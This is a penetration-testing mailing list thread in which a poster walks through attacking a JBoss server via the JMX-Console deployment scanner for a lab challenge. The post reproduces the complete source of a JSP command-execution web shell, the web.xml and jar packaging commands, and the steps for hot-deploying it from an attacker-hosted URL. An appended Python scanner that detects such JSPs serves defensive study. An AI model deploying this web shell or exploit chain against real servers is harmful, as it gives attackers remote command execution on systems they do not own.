Penetration Testing mailing list archives
Re: breaking jboss with a browser? not happening
From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:11:20 -0800 (PST)
Yes, I know about the different upload features of JBoss and am currently exploiting the use of deployment scanners. Thank you for your help.

Danux wrote:

Hint: check the upload features of JBoss. You can upload war files.

Sent via BlackBerry from Danux Network

-----Original Message-----
From: lazers <a.alii85 () gmail com>
Sender: listbounce () securityfocus com
Date: Fri, 14 Jan 2011 12:02:57
To: <pen-test () securityfocus com>
Subject: breaking jboss with a browser? not happening

I have been given a task to break into a JBoss application by my senior sec manager at my company. It's a hacking challenge staged in a test lab.

This is what I have been given: web access to JBoss. Yes, that's pretty much it <3. He believes in the less-is-more philosophy. With some info to get started working: I have been told that a vulnerability exists in the application and it's no 0-day exploit, it's a known vulnerability. It is set as an open-book challenge; I can get help anywhere I like.

So what I did so far? Yes, I googled; but I also ran a Nessus scan, and the scan brought me one HIGH vulnerability. It has to do with the default JBoss installation using the JMX-Console. It's not a new vulnerability; I was able to reach this conclusion as I started googling. This particular vulnerability is very popular; I was saying to myself that my problems were over and I would break into JBoss in record time. But that has been largely untrue. Why? Well, if it wasn't true I wouldn't be here.

I did the following (in steps).

Attack vector: deployment scanner feature

1. Confirmed the default installation (by accessing localhost:9090); in my case it's 9090, not 8080 as in the hacking literature. Probably this is because I'm using a new version (idk the exact reason).

2. I wrote this JSP script (cmd.jsp) as told in sites.

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

3. Next I created a web.xml file to be placed in the WEB-INF folder.

<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>

4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:

jar cvf cmd.war WEB-INF cmd.jsp

5. I put this file on an Apache HTTP server. The file cmd.war resides in the htdocs folder. It can be accessed by the URL: mywebserver:80/cmd.war

6. I go back to the JBoss default page and navigate to the jboss.deployment page.

7. In the addurl tab I enter the path for my cmd.war file as http://mywebserver/cmd.war

8. Next I go to the victim web server in an attempt to access my uploaded application: http://victim:9090/cmd/cmd.jsp

9. I get HTTP STATUS 404 - /cmd/cmd.jsp

My app is supposed to be hot deployed by JBoss, but this is not the case, because even after 10-20 times after you have accessed the file I get the same error page.

I want to know what the reason for this behavior is. I know there exist other attack vectors (e.g. RMI etc.) but I want to stick to this one until I figure out the reason for this failure of the exploit.

Am I compiling the .jsp file with incorrect syntax? Do I need to have a Tomcat server installed instead? I read on the internet that there could be some problems in JBoss trying to get a reverse shell on your web server, as jboss is it work in bind-shell mode only? I'm really clueless as to what is happening. I spent 12 works on this single attack vector but am not making headway.

JBoss gurus, help me. Thanks

--
View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html
Sent from the Penetration Testing mailing list archive at Nabble.com.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org
------------------------------------------------------------------------
--
View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726534.html
Sent from the Penetration Testing mailing list archive at Nabble.com.
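
A defender-side check for the hot-deployment path discussed in this thread, added here as an example and not part of any poster's message: it inspects a WAR or EAR before (or after) it reaches a deployment directory and flags JSPs that pass request parameters into process execution, the pattern cmd.jsp uses. The function names, size cap, nesting depth and sample archives are assumptions constructed for the illustration.

```python
import io
import re
import zipfile

# APIs that spawn an OS process, and reads of client-controlled request input.
EXEC_RE = re.compile(
    r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\(")
PARAM_RE = re.compile(r"request\s*\.\s*getParameter\s*\(")
MAX_BYTES = 5 * 1024 * 1024   # assumption: skip oversized members (zip-bomb guard)
MAX_DEPTH = 2                 # assumption: follow WAR-in-EAR nesting this deep

def scan_archive(data, name="archive", depth=0):
    """Return [(member path, reason)] for JSPs in a WAR/EAR that run OS commands."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(name, "unreadable-archive")]
    findings = []
    with zf:
        for info in zf.infolist():
            path = f"{name}!/{info.filename}"
            lower = info.filename.lower()
            if info.file_size > MAX_BYTES:
                findings.append((path, "skipped-oversized-member"))
            elif lower.endswith((".war", ".jar")) and depth < MAX_DEPTH:
                findings += scan_archive(zf.read(info), path, depth + 1)
            elif lower.endswith((".jsp", ".jspx")):
                text = zf.read(info).decode("utf-8", "replace")
                if EXEC_RE.search(text):
                    tainted = PARAM_RE.search(text)
                    findings.append((path, "exec-from-request-parameter"
                                     if tainted else "process-execution"))
    return findings

def build_archive(members):
    """Build an in-memory archive from {filename: content} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for filename, content in members.items():
            zf.writestr(filename, content)
    return buf.getvalue()

# Constructed samples: the suspect line reuses the call pattern from cmd.jsp in the post.
SUSPECT_JSP = '<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>'
BENIGN_JSP = "<%= new java.util.Date() %>"

if __name__ == "__main__":
    war = build_archive({"WEB-INF/web.xml": "<web-app/>", "cmd.jsp": SUSPECT_JSP})
    for finding in scan_archive(war, "cmd.war"):
        print(finding)
```

A pattern match like this is a triage signal only; obfuscated or precompiled code will not match, so it complements, rather than replaces, restricting access to the JMX console and the deployment scanner.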
Current thread:
- breaking jboss with a browser? not happening lazers (Jan 18)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)
- Re: breaking jboss with a browser? not happening spdr (Jan 20)
- Re: breaking jboss with a browser? not happening danuxx (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening psiinon (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- RE: breaking jboss with a browser? not happening Hembrow, Chris (Jan 20)
- Re: breaking jboss with a browser? not happening YGN Ethical Hacker Group (Jan 23)
- Re: breaking jboss with a browser? not happening Matt Gardenghi (Jan 23)
- RE: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)